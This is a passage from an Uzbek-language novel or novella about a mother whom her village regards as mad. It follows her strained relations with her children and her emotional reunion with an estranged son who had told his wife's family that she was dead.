сингилларини онасининг “чангал”идан қутқариб узоқроқда, одамга ўхшаб яшатишни истайди у. Ўлгудай ўжар, айтгани айтган, дегани деган, ҳеч кимдан ҳайиқмайдиган кенжа синглиси Меҳрини онасидан ажратолмаслигини билса-да, унинг учун ҳам қайғуради, ич-ичидан ачинади. Бугун  у Меҳрининг ўлиб қолишидан шунчалик хавотирга тушди-ки,   синглисига бир гап бўлса ўзини айбдор деб ҳис этгани учунгина эмас, балки унга нисбатан қалбида акалик меҳри борлиги учун ҳам хавотирланаётганини ҳис этди ва қилмишидан уялиб кетди. Назарида пул турган  чўнтаги бутун танасини ловуллатаётгандай туюлди. Бозор рўпарасига келганида кўзи  исириқ тутатиб садақа сўраётган тиланчи аёлга тушди, беихтиёр мотоциклни тўхтатиб,  уни кузатиб турди. Тиланчи Шамсиддин томонга юриб, ўзига тикилиб турган йигитдан умидвор бўлиб қўлини чўзди: –Садақа радди  бало, садақа қил, ўғлим, ишларинг юришиб кетсин, юрагингдан ғашлик арисин, беморларингни дардига даво  берсин... Шамсиддин бир зум иккиланиб турди, вужудига олов пуркаётган пулларни бериб, ўзини бу оташдан халос этмоқчи бўлди-ю,  яна иккиланди: “Эй аҳмоқ Шамсиддин, – қўлини чўнтагидан узмай  ўзига ўзи таъна қилди у.– Нима қилмоқчисан? Онанг билан синглингни чирқиратиб олган пулларни бир тиланчига бермоқчимисан? Шунчалик тубанмисан?” У ўзидан ғижинди, эсини йиғиб олди-да, мотоциклни ўт олдириб, йўлида давом этди,  кўнглига қил сиғмаганидан  ишга ҳам оёғи тортмади ва уйига йўл олди, остона ҳатлаб кираркан қўзларини хотинидан олиб қочишга уринди, барибир эрини кўрган Норхолнинг капалаги учди. –Нима бўлди? –сўради у хавотир билан. – Рангингизда ранг қолмабди, сочларингиз тўзғиган. Шамсиддин хотинига лом-мим демади, хонага кириб, кўрпачага чўзилди, кўзларини шифтдан узмай хаёлга толди.  Унинг ортидан изма из кириб келган Норхол яна хавотир билан сўради: –Тинчликми? Ҳеч ким билан жанжаллашмадингизми? –Йўқ, –зўрға жавоб қайтарди Шамсиддин ҳануз кўзларини шифтдан узмай. –Онам мендан бир оғиз сўрамай  бузоқни сўйиб сотибди. Жаҳлимга чидолмай пулларини тортиб олдим. –Бекор қилибсиз, онани оғринтирмайдилар, Шамсиддин ака, – деди Норхол эрини койиб. –Ҳали ҳам кеч эмас, бориб узр сўраб, пулларини қайтариб беринг, норози бўлмасинлар. –Норози қилиб бўлдим. У Меҳрини итариб, ҳушидан кеткизганини хотинига айтмади, уялди, ухлаб ҳамма нарсани унутгиси келиб,  ўнг ёнбошига ағдарилди. Эрига  гапини ўтказолмаслигини билган Норхол хонадан чиқиб кетди, Шамсиддин анча пайтгача тўлғониб ётди, бироқ  ухлолмади, кўнгли ғаш, хаёли жойида эмас эди. Қоронғи тушиши билан хотинига, ҳозир келаман, деди-ю, мотоциклга миниб, қишлоққа йўл олди. Узоқроқда мотоциклини тўхтатиб,  яёв юриб дарвозага яқинлашди ва тахталар орасидаги ёриқдан ичкарига мўралади: ҳаммаёқ жимжит, атроф сукунат измида эди. “Хайрият, – деди у ўзига ўзи.–Меҳрига ҳеч нарса қилмабди.– Хайрият”. У рўмолчани дарвоза тепасидан ичкарига отди ва қандай шиддат билан келган бўлса шундай шиддат билан ортига қайтди... Эрталаб вақтли туриб ҳовлига чиққан  Маъқул хола  дарвозахонада турган таниш рўмолчани кўриб тўхтади ва  энгашиб қўлига олди.  Пул қандай тугилган бўлса шундайлигича турарди.  Аёлнинг кўзлари қувончдан порлади, у пул ўзига қайтгани учун эмас, балки ўғлига инсоф киргани учун хурсанд эди.  Аслида Маъқул хола телба бўлса-да,  бузоқнинг  пулига мушук офтобга чиқмаслигини – уй қуролмаслигини яхши билар, шунчаки бу  пулга  иморатлик бирор нарса олиб қўймоқчи эди...   ХХХ             Бодом ўғил туғибди! Санамдан бу хушхабарни эшитган Маъқул хола  яна бир набирага етказгани учун Аллоҳга шукроналар айтиб, бирданига картошка билан тухум қовуришга тушди ва  Санамни Бодомдан хабар олиш учун туғруқхонага  юборди. Ўзи сандиғини  титкилаб, беқасам мато топди-да, чақалоққа тўн тикишга тушди. –Бодом ўғил кўрибди, –деди уни тикиш қилаётганини кўриб ажабланиб қолган Меҳрига. –Чақалоққа тўн тикяпман. –Тўн тикишни биласизми? –  сўради Меҳри. –Сен ҳам опанг ва акангга ўхшаб, онам жинниликдан бошқа нарсага ярамайди, деб ўйладингми? Бир пайтлар қишлоқнинг каттасидан тортиб кичигигача ўзим тўн тикиб берганман, ўн бармоғим ҳунар эди. Касал бўлиб қолганимдан сўнг бу ишлар юрагимни сиқиб, тикмай қўйдим. Маъқул хола ўйга толди, Меҳри унинг кўзлари ёшланганини сезди. –Она, ранжидингизми? Мен шунчаки сўраган эдим. –Нега ранжирканман, сен мени тикиш қилганимни кўрмаганингдан кейин сўрайсан-да. Шунчаки Бодом опангни соғиндим. Қизи тушмагур жуда тошбағир чиқди-да, қорасини кўрсатай демайди. Чарлар қилишимга ҳам кўнмади. Шамсиддин  мени ёмон кўрсаям оёғини узмайди,  келиб туради. Унинг важоҳат билан келиб, важоҳат билан кетганига ҳам шукур қиламан. Бодом эса... –Хафа бўлманг, –онасини юпатди Меҳри. –Уйидагилар рухсат беришмаса керак-да... –Бегуноҳ одамларни айблама,– Маъқул хола қизининг гапини бўлди.  –Эрга тегишидан олдин ҳам опангнинг феъли шунақа эди. Онамни кўриб келаман, деса эри бошига тегирмон тоши юритмас, ўзи бемеҳр. Майли, қаерда бўлсаям соғ бўлсин. –Опамникига ўзингиз боринг, шу баҳона кўриб келасиз. –Йўқ,  туғруқхонадан чиқиб олсин, Санам иккингиз борасиз. Орадан ўн кунлар ўтиб, якшанбада Маъқул хола  палов дамлаб, лаганга сузди-да, устига иккита нон, чақалоқнинг тўнчасини қўйиб Санам билан Меҳрини Бодомникига жўнатди. Бодом қайнонаси Иззат ая билан чақалоқни чўмилтириб бўлиб, эмизаётган экан, икки енгини тирсагигача шимарган Иззат ая қизларга пешвоз чиқди. –Келинглар, холажонлар, келинглар. – У меҳмонларни очиқ чеҳра билан кутиб олди. – Жиянчалар муборак бўлсин.  Қудам қани, нега олиб келмадинглар? Бешикка энгашганича боласини эмизаётган Бодом  сингилларига қараб жилмайиб қўйди, кўзи билан кўрпачага ишора қилиб: –Ўтиринглар, –деди. Иззат ая дуога қўл очди, кейин яна қизларни койиди: –Қудамни олиб келмаганларинг чакки бўлибди-да, бирпас ўтириб кетардилар. –Онамнинг сал тоблари йўқ эди, сизлар борақолинглар, дедилар. –Эсиз, келин туширганимга уч йилга яқинлашяпти, ҳали икки қуда кўришганимиз йўқ, тўйда ҳам тоблари йўқ экан, қатнашмадилар. Келинга бир-икки олиб борай, дегандим, хўпдан нарига ўтмадилар. Кейинги гал, албатта, қудам билан келинглар, йўқса, ўзимиз бостириб борамиз, шундайми, Лазизбек. Иззат ая бешикка  яқинроқ сурилиб, набирасини эркалатишга тушганди, Бодом кўкрагининг учини гўдаги оғзидан чиқариб, сингиллари ёнига ўтди. –Асалим мени, новвотим мени,  бувиси кўришга келмабдими бу ширинтойни, бувиси кўргиси келмабдими шундай шакар болачани... –Чақалоқни бир кўрай, –Меҳри ўрнидан туриб бешикка энгашди. –Кимга ўхшайди? –Бешикдаги беш турланади, ҳали бир нарса дейиш қийин, –  деди Иззат ая. –  Ҳозирча қаеридир отасига ўхшагандай. Иззат ая очиқ кўнгил, ҳар нарсага қизиқувчан  аёл экан, яна қизларни саволга тутди, ўқишларини суриштирди, Ғайбиддиннинг иши-ю, Хайрулланинг хизматигача сўради. Шундан сўнг, мен ҳозир, деб чиқиб кетди, опа-сингиллар ёлғиз қолишди. –Онам сўраб юбордилар, –Меҳри Бодомга юзланди.  –Сизни жуда соғинибдилар. –Қайнонаси айтди, деб яна онамни етаклаб келма. –Бодом онасининг аҳволини сўраш ўрнига Меҳрининг жиғига тегди. –Онам сизни еб қўядими? –  жаҳли чиқди  Меҳрининг. –Егандан баттар қилади, тутуриқсиз гаплари билан шарманда қилади, онамни олиб келадиган бўлсанг, сен ҳам келма. Қайнонам нега бунча уни суриштирганини биласанми, жинни деб эшитган, жиннилигини ўз кўзи билан кўрмоқчи, кейин ҳар гапида менга пичинг отади. –Қайнонангиз ёмон аёлга ўхшамайди, опа, –гапга аралашди Санам. –Буни қайнонам билан яшаб кўрсанг биласан. Сув илон у, бировларнинг олдида ялтоқланади, ҳеч ким бўлмаса – заҳар. – Кўр кўрни қоронғида тапади, қайнона-келин мос тушибсизлар, –жизғириб гапирди Меҳри. –Ўхшатмасдан учратмас, –деди Санам ҳам кулиб. –Устимдан кулманглар, мен гапнинг борини айтяпман. Қайнонам, орзу-ҳавас кўрмаган эмиш. Онангизникига борамиз, деган гапидан қулоқларим қоматга келди, бир амаллаб орқага суриб юрибман, аммо энди қўймайди, барибир  бу жодугар, ҳадемай бизни олдига солиб онамникига олиб бориши аниқ,  шундай экан онамнинг келиши шарт эмас. –Онам жинни бўлсаям орсиз эмас, сизникига келаман, деб кўзи учиб тургани йўқ. –Қайнонангиз борамиз деса бораверинглар, опа, –энди Санам гапга аралашди. –Онамнинг оти жиннига чиққани билан айрим соғлардан яхши,  ҳар доим жиннилик қилавермаслигини ўзингиз ҳам биласиз. Кўп ўтмай эшик очилиб, қўлида дастурхон қўтарган Иззат ая кўринди. –Қуда хола, биз қайтамиз, дастурхоннинг кераги йўқ, овора бўлманг, – деди Санам. –Овораси борми? Келиш меҳмоннинг, кетиш мезбоннинг измида. Боз устига чақалоқли уйдан қуруқ оғиз чиқмайдилар. Бодом ўрнидан туриб, қайнонаси қўлидаги дастурхонни тўшагач, чой дамлаб келди, дастурхон устига қанд-қурс, онаси бериб юборган паловдан қўйди. –Ош энди бизники,  бемалол суҳбатлашиб, олиб ўтиринглар, мен бобосининг олдиларига борай. –Ўтиринг, қуда хола, ошдан енг. – Сизлар бемалол, мен бобосининг ёнларига борай. Иззат ая чиқиб кетгач, негадир гап-гапга қовушмади, Лазизбек ухлаб қолди,  ўртага совуқ бир сукунат чўкди, Санам билан Меҳри дастурхондаги неъматлардан чуқилаб ўтиришди. –Паловдан олинглар, совимасин, –сингилларига мулозамат кўрсатди Бодом. –Уйдан ош егандик, биз энди борайлик, –деди Санам. –Қайнонангизни чақирсангиз дастурхонга дуо ўқиб берардилар. –Ўзларинг ўқийверинглар. Қизлар бир-бирларига қараб, “пиқ” этиб кулишди ва Бодомнинг хумрайиб турганини кўриб билганларича фотиҳа ўқиб, ўринларидан қўзғалишди. –Гапим эсларингдан чиқмасин, онамни олиб келманглар, чилламиз чиқса, ўзимиз борамиз. –Опа, тўтиқушдай ҳадеб бир гапни такрорлайверасизми, Меҳри, келмайдилар, деб айтди-ку, бўлди-да энди. Опа-сингилларнинг кетаётганини кўриб Иззат ая уларни бекатгача кузатиб қўйди ва қайта-қайта тайинлади: –Қудам, албатта, келсинлар. Кутаман-а. –Хўп, –   деди Санам, –айтамиз,  келадилар. –Келсин-келмасин, келсин-келмасин, –Иззат ая узоқлашгач Меҳри киноя билан гапирди. –Қайнонаси келсин, дейди, келини келмасин, дейди, қайси бирининг топшириғини бажарамиз энди, опа? – Бодомникини-да, – деб жавоб берди Санам. –Онамга, юринг, десак ҳам келмайдилар. Хоҳишлари бўлса шу пайтгача акамникига борардилар, Норхол янгам неча марта таклиф қилдилар. Тўғрисини айтсам, акамнинг хотини опамдан минг марта яхши, онамга меҳрибон. –Тўғри айтасан. –Опамнинг қайнонаси ҳам яхши аёлга ўхшайди, –деди Меҳри автобусда кетишаркан. – Лекин ўзи нега бунақа? Қайнонасига ҳам аллақачон лақаб қўйиб олибди. Жодугар эмиш.  Онасига нима каромат кўрсатдики, қайнонасига кўрсатади. Мен онамни бир соат кўрмасам соғинаман,  у эса... –Онамнинг бир гаплари эсингдами? –Санам синглисининг  сўзини бўлди. –Қайси гаплари? –Бир куни Шамсиддин акамдан калтак еганларида сен билан мен овутдик, қўл-оёқларини ўқалаб қўйдик. Ўшанда онам, битта палак ҳар хил қовун тугади, деганлари тўғри экан, ҳаммангиз ҳар хилсиз, дегандилар. –Биз қовун эмас, одам-ку, опа.  Ё Бодом опам  одам эмасми? –Унақа дема, –койиб берди Санам. –Ўзингдан катталар ҳақида ёмон гап айтма,  мақол қовун ҳақида бўлсаям одамлар назарда тутилган. Мана, масалан, ота-онамиз бир, бироқ  сен билан мен икки хилмиз, опам ҳам бошқача, феъли оғирроқ, тошбағирроқ. –Қовуннинг селитра солингани, денг опа. Санам билан Меҳри қаҳ-қаҳ отиб кулиб юборди, ҳамма уларга ўгирилди, иккаласи ҳам бирданига жим бўлди. Бу орада автобус қишлоққа етиб келди, улар гап билан   вақт ўтганини ҳам сезишмабди. Маъқул хола қизларини кўчада кутиб ўтирарди. –Опам билан қуда холам сўраб юбордилар, –   деди Санам. –  Ўзингиз ҳам бораркансиз? –Бодом ҳам шундай дедими? – ишонқирамай сўради Маъқул хола. Икки қиз бир-бирларига қараб олишди, Меҳри ёлғон гапиролмади, индамай ҳовлига кириб кетди. –Ҳа, –  деди ноилож қолган Санам ва зийрак онаси ёлғон гапирганини сезиб турганидан уялиб қўшиб қўйди: –Чилласи чиқса, қуда холам чақалоқни олиб келарканлар. –Олиб келишса, бош устига,–деди Маъқул хола, –жонимга жойлайман. Орадан анча вақт ўтиб Маъқул хола қизларини яна Бодомникига юбормоқчи эди, ҳар иккиси ҳам бормаймиз, деб оёқ тираб олди.   ХХХ   Душанба куни эрталаб Маъқул хола хуш кайфият билан ўрнидан турди. Тушида Ғайбиддин томдан ошиб келиб  онасини маҳкам қучоқлаб олганмиш,  уларга қараб Санам билан Меҳри қиқир-қиқир кулармиш. Она-боланинг ўртасида қуйидаги суҳбат бўлиб ўтибди: “Нега томдан ошиб келдинг?” “Қўшнилар кўрмасин дедим”. “Қўшнилар кўрса кўраверсин”. “Гап қилишади”. “Гапдан қўрқсанг, нега келдинг?” “Сизни соғиндим”. “Соғинсанг шу пайтгача келардинг-да?” “Тоғдан ўтолмайман, деб қўрқдим”. “Ўртада тоғ бормиди?” “Ҳа”. “Энди ўтолдингми?” “Бир амалладим”. “Қайтиб кетмайсанми?” “Кетаман, тоғнинг ортида ҳам онам ва сингилларим бор”. Маъқул хола уйғониши билан тушини эслади ва мийиғида кулиб қўйди, ўғлининг ҳар бир сўзи мағзини қайта-қайта чақаркан, таъбирини яхшиликка йўйди: Ғайбиддин келади, албатта,  келади! Унинг оғзи қулоғида эди, тилидан шу сўзлар тушмай қолди: Ғайбиддин келади, албатта, келади. Маьқул хола юз-қўлларини ювди-да, ҳовузнинг ёнига бориб сувга тикилди. “Эй обиҳаёт! Бугун Ғайбиддиним тушибга кирибди. Мени маҳкам қучоқлаб олиб, сизни соғиндим, деди. У тўғри айтди. У сира ёлғон гапирмаган, мени алдамаган,  урмаган. Мен Ғайбиддинга  ишонаман. У мени соғинган. У, албатта, келади, мени кўргани келади. Эй обиҳаёт! Мен ҳам Ғайбиддинни соғинганман. Шу кўрган тушим ўнгидан келсин ва ўғлим билан дийдор кўришиш насиб этсин, болагинамни бағримга босай...” –Тушингни сувга айтяпсанми? Маъқул хола чўчиб тушди ва бошини кўтариб, Шамсиддинни кўрди. –Кел, болам. Каллайи саҳарлаб нима қилиб юрибсан? –Санам шу ердами, кеча ўқишга кетмадими? –Йўқ, бугун эрталаб кетаман, деганди, уйғотмоқчи бўлиб тургандим. Маъқул хола сўзини тугатар тугатмас уйдан кўзини ишқалаб Санам чиқиб қелди. –Ўқишга борсанг, олиб кетаман, тез бўл, –деди Шамсиддин унга. –Ҳозир, ака. Санам апил-тапил юз-қўлини ювиб,  чой дамлади. –Ака, бир пиёла чой ичиб олайлик, сиз ҳам келинг. –Мен тўйдан келяпман, –деди Шамсиддин. –Ош едим, Абдунаби ўғлини суннат қилибди. –Бугун Ғайбиддин тушимга кирибди, –Маъқул хола Шамсиддинга умидвор термулди. –Мени қучоқлаб олди, иккаламиз суҳбатлашдик. Келиб қолармикин, нима дейсан? Сувга илтижо қилиб, тушимни ўнгига бошқар, десам, жимирлаб, товланиб кетди, жавоб қайтарди: ўғлинг келади, деди. Шамсиддиннинг энсаси қотди. –Ғайбиддин бир ҳафта аввал хотини, қизчаси билан келди, икки кеча ётишди, –деди у. – Тошкент сенга бир нарса йилт этса чопиб келадиган қўшнининг уйи эмас. Бир зумда Маъқул холанинг,  авзойи бузилди. –Нега бизникига келмади? –  жазаваси тутиб кетди унинг. – Нега менга билдирмадинг? Қанақа инсонсан ўзи? Соғинганимни билмасмидинг? –Ўчир овозингни, –ўдағайлади Шамсиддин. –У аҳмоқми, сеникига келади?  Тошкентлик хотини олдида шарманда бўлсинми? –Шамсиддин Санамга ўгирилди. – Тезроқ бўл, кетамиз. –Ўчирмайман, – Маъқул хола илк марта Шамсиддинга тик гапирди. – Ўчирмайман! Сен она юраги қанақалигини биласанми ўзи? Билмайсан! Билганингда Ғайбиддинни олдингга солиб келардинг, мана, она, бебош ўғлингиз, деган бўлардинг, мени тушунардинг, юрак-бағрим идраб ётганини сезардинг. Сен битта бола кўрибсан-у, ота бўлмабсан. Сен ота эмассан.... Сен... Сен... Ҳаммани ўзингдай деб ўйлайсан... Тошбағирсан... Маьқул хола йиғлашга тушди. –Халойиқ, мен бола ўстирмадим балойижон ўстирдим, Ғайбиддинни мендан яширди у, кўрсатмади, мени назарига илмади, мени жинни фаҳмлади... –Тезроқ чиқ, –Шамсиддин Санамга қаради. –Эчкининг орқаси қичиса, тўйхонага борармиш, нега кирдим ўзи? –Ака, ростдан Ғайбиддин акам келдиларми? –сўради Санам мотоциклга ўтираркан. –Гапнинг ёлғони бўладими? Туғилган куним сенларнинг хаёлингда ҳам йўқ, лекин у хотини билан келди. –Ҳеч қайсимизни туғилган кунимизда биров йўқламайди, ака. Улар тошкентликда, одатлари бошқача. Аммо бу ҳақда онамга бекор айтдингиз, ўтган йили келганларини ҳам яширгандик. –Жазаваси тутишини қаердан билибман. Бир ҳисобдан шуниси яхши,  Ғайбиддиндан умид қилмайди. –Қайтанга умид қилганлари яхши эди... Ўша куни кун бўйи Маъқул холанинг кайфияти кўтарилмади, туз ҳам тотмади. Кечга яқин ўтирган жойидан ирғиб турди-да, уч-тўртта кўйлагини тугунлади. –Ҳа, она,  қаерга отланяпсиз? –сўради Меҳри. –Тошкентга, энди ўзим Ғайбиддинни қидириб топаман. Меҳри онасини қайтаришга уринди. –Она, тўхтанг, қоронғи тушяпти, уйга киринг, эртага борасиз. – Йўқ, ҳозир бораман, сен йўлимни тўсма, поезд кетиб қолади, қоч. Меҳри уни силтаб ўтиб кетган Маъқул холани ушлаб қололмаслигини билиб индамади ва дарвоза ёнидаги ўриндиқда қайтишини кутиб ўтирганди, Санам қўлидан судрагудек қилиб олиб кирди уни. –Сен кўчада ўтирсанг ҳам, ўтирмасанг ҳам онам қайтади, бу унинг ҳар галги одати. Ундан кўра овқатингни е-да, дарсингни тайёрла. Меҳри индамай опасига эргашди, истар-истамас овқатини еди ҳамки хаёлидан онаси кетмади. У ўғлини қаттиқ соғинган, ўтган ҳафта расмига қараб йиғлаб ўтирганини  Меҳри ўз кўзи билан кўрганди. –Акаларингнинг орасида Ғайбиддин бошқача, кўнглимга қараб иш  тутарди, –  деди онаси унга. –Шамсиддин урса, тарафимни олмаса ҳам кўзлари жовдирайди. Кўрмаганимга икки йил бўлди-ю, худди икки юз йилдай туюлади менга. Армияга кетса ҳам эрта-индин келади, деб умид қилиб ўтирардим.  Уни кутишни ҳам билмайман, кутмасликни ҳам, афти-ангори  эсимдан чиққан. Ғайбиддиндан гина қилсамми, Бодомданми? Аъмолим қаттиқ бўлмаса, ёнимда яшаб юрган қиз ҳам қорасини кўрсатмайдими? Маьқул холанинг бўғзига нимадир тиқилди, бошқа гапиролмади. “Ҳақиқатдан нега биз бунчалар бемеҳрмиз, –ўйлади Меҳри. – Ҳаммасига онамнинг касаллиги сабабчими? Йўқса, Тошкентдай жойдан келган акам  онамдан, сингилларимдан хабар олай демайдими? Шунчалар бағритошлик, ноинсофлик қиладими? Уни соғинганимдан менинг юрагим ёняпти, онамнинг жонига тўзим берсин”. Меҳри шуларни эсларкан, юраги сиқилди. Дарс тайёрлашга ўтирса ҳам хаёли чалғийверди. Орадан бир оз ўтиб, Маъқул хола қайтди-да, овқат емай, кўрпачанинг устига чўзилганича уйқуга кетди. “Онам бечора боласини соғинган, –ўйлади Меҳри. – Мен ҳам акамни соғиндим. Жуда соғиндим”. Онасининг ҳолати Меҳрига таьсир қилди унсиз йиғлади. Уйга кириб, альбом ичидан  Ғайбиддиннинг болаликда тушган суратини топиб тикилиб ўтирди. Идиш-товоқларни ювиб келган Санам унинг йиғлаганини сезди,  қўлидаги суратни кўргач, ҳаммасини англади. –Йиғладингми? – секингина сўради синглисидан. –Ҳа. –Акамни соғиндингми? –Ҳа. –Мен ҳам соғиндим, жудаям соғиндим. Юз тузилишиниям  унутгандим, мана, суратига қариб эслаяпман. Кўз ўнгимга келтириш учун кўзларимни юмиб оламан-у келтиролмайман. У ўзгариб кетгандир. Меҳри жавоб қайтармади, унинг елкалари титрар, йиғларди.  Санам синглисини қучоқлаб олди. –Бўлди, бас қил, онам  сезиб қоладилар. Меҳри ўзини тўхтата олмади, энди опасининг кўксига бошини қўйиб йиғлади. ХХХ   Шу воқеадан уч ой ўтиб, шанба кунларининг бирида Санам эндигина техникумдан  қайтиб, кийимларини алмаштираётган, Меҳри кечки овқатга тараддуд кўраётган пайтда, дарвозанинг ғийқ этиб очилгани эшитилди ва у нигоҳини ўша томонга қадади. –Меҳри, танимадингми? Меҳри таниди, овозидан таниди, эҳтимол товушини чиқармаганида таниёлмай, бу башанг кийинган йигит ким экан деб тикилиб қолармиди, лекин бундай бўлмади, инсоннинг қиёфаси ўзгарса ҳам овози ўзгармас, ўша-ўша тураверар экан, шунинг учун ҳам Меҳри таниди, овозидан таниди. Дарвозадан бўйлари чўзилиб, юзлари  тиниқлашган,   кийимлари ўзига ярашган Ғайбиддин кириб келганди, Меҳри кўзларига ишонмай юраги ҳаприқиб кетди, акасини таниса-да, ўзини унинг қучоғига отишдан тийди, кўнглидан ростдан ҳам шундай келишган, чиройли йигит менинг акамми, деган савол ўтди ва маҳлиё бўлиб тураверди. Унинг жим қотиб қолганини кўрган Ғайбиддин, танимади, деб ўйлади ва саволини  такрорлади: –Меҳри, танимадингми? Меҳри таниди, овозидан таниди, аммо ўзини йўқотганди, кўзлари Шамсиддин билан Хайрулланинг афт-ангорига ўрганиб қолганиданми, савлатли, салобатли ва кўркам, нигоҳидан меҳр ёғилган, кўрган киши амалдорми, деб ўйлайдиган бу йигитни акаси эканини билса ҳам ишонқирамаётганди. Ниҳоят Меҳри ўзини акасининг қучоғига отди. Ғайбиддин синглисини бағрига босиб, пешонасидан ўпаётганида ароқ ҳиди анқиди ва Меҳри унинг ширакайфлигини билди, аммо бунга парво қилмади, негаки, ҳозир унинг учун муҳими акасининг ташрифи эди. –Она, акам келдилар, Ғайбиддин акам! Она! – Меҳри тилла топиб олган одамдай қувонч билан бақирди. Уйдан олдинма-кейин  Санам билан онаси югуриб чиқишди.  Маъқул хола ўғлини кўриб ажабланмади, жавраб-жавраб унга яқинлашди: –Ана, айтмадимми сенларга, Ғайбиддин келади, тушимга кирди  демадимми? Шамсиддин, келмайди, умид қилманг десаям умидимни узмадим, кутдим, мана,  келди, айтганим тўғри чиқди. Яна  Шамсиддин мени жинни дейди. Ғайбиддин  онасига қараб жилмайиб турарди, у ёнига чопиб келган Санамнинг пешонасидан ўпди-да, онасини қучоқлади. –Онажон! Онажонгинам! Маъқул хола боласининг юзларидан ўпиб йиғлаб юборди. –Сени жуда соғиндим, ҳар куни тушимга кирасан, ҳар куни соғинаман, ҳатто афти-ангоринг ҳам эсимдан чиқди. Ўтган гал келганингда хабар бермаганинг учун сендан ҳам, келиндан ҳам хафа бўлдим, юрагим лов-лов ёнди. Онамни кўриб кетай, соғингандир, деб ўйламадингми? Ғайбиддиннинг яхшигина кайфи бор эди, дабдираб кетди. –Кечиринг, онажон! Кечиринг! Мен ана шунақа номард ўғилман. Сизни ўлдига чиқарган ўғилман. Хотиним ҳам, унинг қариндошлари ҳам онам борлигини билишмайди. Уларга сизни ўлган, деганман. Ўтган гал хотиним ёнимдалиги учун сиздан хабар ололмадим, билиб қолмасин, деб қўрқдим. Ғайбиддин йиғлади. –Болам, нима қилардинг ёлғон гапириб? Мени уларга таништирсанг кўп гапирмай,  жим ўтирардим, хотинингни кўрардим. Тошкентлик келиним қанақа экан, деб ўйлаганим ўйлаган. Иккита қиз кўрибсан, оти ҳам ғалати экан эсимдан чиқди, уларни ҳам кўргим келади, узоқдан бўлсаям кўргим келади. –Шунинг учун кечирим сўраяпман-да, она. Бир пайтлар ота-онам ўлган, деган сўз оғзимдан чиқиб кетди, кейин алдагандим, деб айтолмадим. Ёлғоннинг орасида қолиб, сизни ўлдига чиқардим, онажон! Ғайбиддин онасини қучоқлаб йиғлайверди. Унга Меҳри билан Санам қўшилди, акасининг гаплари опа-сингилларни эритиб юборди –Йиғлама, болам, – деди Маъқул хола Ғайбиддинга. – Мана, кўряпсан, тирикман, ўлганим йўқ, гўрдан ташқарида, болаларимнинг дуойи жонини қилиб юрибман. Аканг ҳар замонда келиб тириклай кўмиб кетишини ҳисобга олмаса, аҳволим яхши, сингилларинг ёнимда. –Акамни кечиринг, она. Унинг феъли шунақа, аслида сизни ёмон кўрмайди. У эзилган, уни эзишган. Сиз билмайсиз, кўчада бизни қандай масхаралаганларини, одам ўрнида кўрмаганларини. Биз ҳаммамиз атрофимиздагилардан қўрқиб, ҳадиксираб яшаганмиз. Биз ўзимизни ҳаммадан кам, деб билганмиз. Шунинг учун сизни хушламаганмиз, сиздан ранжиганмиз, сиздан ор қилганмиз. Сизга бўлган меҳримиз устини ана шунақа юклар босиб олган. Бу юкнинг остидан чиқиш қийин бўлган. Ботиб қолганмиз. Бизни тушунинг ва кечиринг, она. –Кишининг оти бир ёмонга чиқмасин, болам. Ҳамма мени жинни деб ўйлайди. Жинниманми, соғманми, сизларни яхши кўраман, бармоқларингга  ақалли тикан киришини истамайман. Сени кўриб бошим осмонга етди, бошқача бўлиб кетибсан. –Акамга Тошкент ёқибди, она, – деди Санам Ғайбиддинга меҳр билан тикилиб. –Чиройли бўлиб кетибсиз, ака, –Санамни маъқуллади Меҳри ҳам. – Овоз чиқармасангиз танимасдим. –Ростданми? –Ғайбиддин ғурурланиб, гапни ҳазилга бурди. –Шунинг учун янганг ёнидан жилдирмас экан-да. Қишлоққа бориб келай, деб зўрға кўндирдим. “Яқинда бордик-ку, нима қиласиз?”, дейди. У шўрлик қишлоқда менинг онаизорим яшашини қайдан билсин? Нега келганимни биласанми? Билмайсан! Айтайми, онамни кўриш учун! Олдинги сафар сизларни кўрмай кетганим алам қилди, виждоним қийналди. Шунинг учун йўлга отландим ва бир йўла сиз иккала пучуқни ҳам кўрай дедим. Сизларга совға ҳам олдим. Ғайбиддин сумкасидан онасига қалин жун рўмол, сингилларига кийимлик мато чиқариб берди. –Тиктириб киясизлар, тайёр кийим олай десам, мос келадими, йўқми, деб иккиландим. –Менга шу маъқул, –деди Меҳри.– Ибодат янгам тикиб берадилар. –Менга ҳам ёқди, –Санам акасига миннатдорона боқди. –Шунақа рўмолга ҳавасим кетганди,–  деб гапирди Маъқул хола рўмолни учбурчак қилиб боғлаб кўраркан. –Барака топ, болам. Аслида ҳеч нарса олиб келмасанг ҳам бошим осмонга етарди. –Сизларга қанча қилсам оз, мен на ўғил бўлиб, на ака бўлиб бурчимни бажарганман. –Унақа гапларни айтма, болам, –Маъқул хола уни койиган бўлди. –Ҳовлида туравермай уйга кир, бугун сен учун ўзим бир палов дамлай. Улар биргаликда уйга киришди. –Уч-тўрт кун турасанми, Ғайбиддинжон? –  сўради Маъқул хола. –Эртага қайтаман. Кетиш олдидан отамнинг қабрларини зиёрат қилмоқчиман. –Шундай қил, ўғлим, отангнинг руҳи шод бўлади. У ҳам баумид ўғил ўстирган. Раҳматли меҳнаткаш инсон эди,  раис нима иш буюрса бажарарди. Менга ўзи хоҳлаб уйланди, аммо беш йил фарзанд кўрмадик. Бу нарса отангга ёмон таъсир қилди, ичиб, мени калтаклайдиган одат чиқарди. Етти мозорга бош уриб Шамсиддинни топдим. Отанг уни шунчалик эркалатдики, аканг бизни сенсираса ҳам индамади. Кейин бирин-кетин сизлар туғилдинглар, бу орада, ўзи касалланиб қолди, йил сайин ҳолсизланиб, тинка-мадори қуриб бораверди. Колхозда пахтанинг дорисини фақат отанг сепарди, духтирлар ишини алмаштирсин, дейишганди, унамади, раҳматли. “Тракторчиликдан бўшалсам нима иш қиламан, сенларни қандай боқаман?”, деб аламини ичкиликдан олди. Бир гал: ”Дадаси, ичманг шу ароқни, афти-ангорингизга қараб бўлмайди”, дегандим, “Заҳарни заҳар кесади, хотин, ичмасам дори мени енгади”, деди. Отанг ичса, отасини танимасди, айниқса, Меҳри туғилганидан сўнг мен ҳам касалланиб қолдим,  кўчага чиқиб кетадиган бўлибман. Бир гал маст бўлиб мени шунақа тепдики, бошимни деворларга уриб олди. “Менинг касалик етмагандай сен ҳам касал бўласанми, энди болаларимнинг аҳволи нима кечади”,  дер эди нуқул. Ўзига келгач, кечирим сўради, яна қўл тегдирсам, қўлларим кесилсин, деб қасам ичди, лекин  отанг қасамхўр бўлиб қолганди, ичса дунёни унутар, кўзлари косасидан чиққудай бўлиб, ваҳшийлашарди. Ўйлаб кўрсам, бу дунёга келиб умрим ғам-ғурбат билан ўтаяпти, тузук кун кўрганим йўқ. Болалигимда 